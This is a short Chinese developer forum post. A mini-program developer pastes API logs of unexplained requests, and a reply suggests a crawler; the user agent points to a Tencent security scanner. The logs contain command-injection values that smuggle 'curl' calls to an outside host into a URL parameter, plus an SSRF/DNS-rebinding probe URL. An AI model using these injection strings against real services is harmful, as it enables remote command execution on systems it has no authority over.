问题现象
大量接口被请求,我就奇怪,接口是怎么暴露出去的,以下为日志记录:
2021-09-22 14:07:56.4983 | Debug | api?action=';curl tst.qq.com/cmd_inject/10fb69c8bb1339fd0511eb1dbd0cabb1;'
2021-09-22 14:07:56.5039 | Debug | api?user_id=undefined&action=GetBalanceGroupByCategory&month=http://tst.tst.mauu.me/dnsrebending?05999a7ef26057a68f8e117d86d1a071&year=2021
2021-09-22 14:07:56.5659 | Debug | api?action=';curl tst.qq.com/cmd_inject/10fb69c8bb1339fd0511eb1dbd0cabb1;'
2021-09-22 14:07:56.6066 | Debug | api?action=GetList';curl tst.qq.com/cmd_inject/10fb69c8bb1339fd0511eb1dbd0cabb1;'
2021-09-22 14:07:56.6446 | Debug | api?action=GetList'|curl tst.qq.com/cmd_inject/7f6be3d090309608061a89852268da31 %23'
2021-09-22 14:07:56.6634 | Debug | api?action='|curl tst.qq.com/cmd_inject/7f6be3d090309608061a89852268da31 %23'
这几次更新小程序后,都会发生,一直调用接口
你好,验证下是不是爬虫呢https://developers.weixin.qq.com/miniprogram/dev/framework/search/seo.html
UA:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 TST(Tencent_Security_Team) 74d6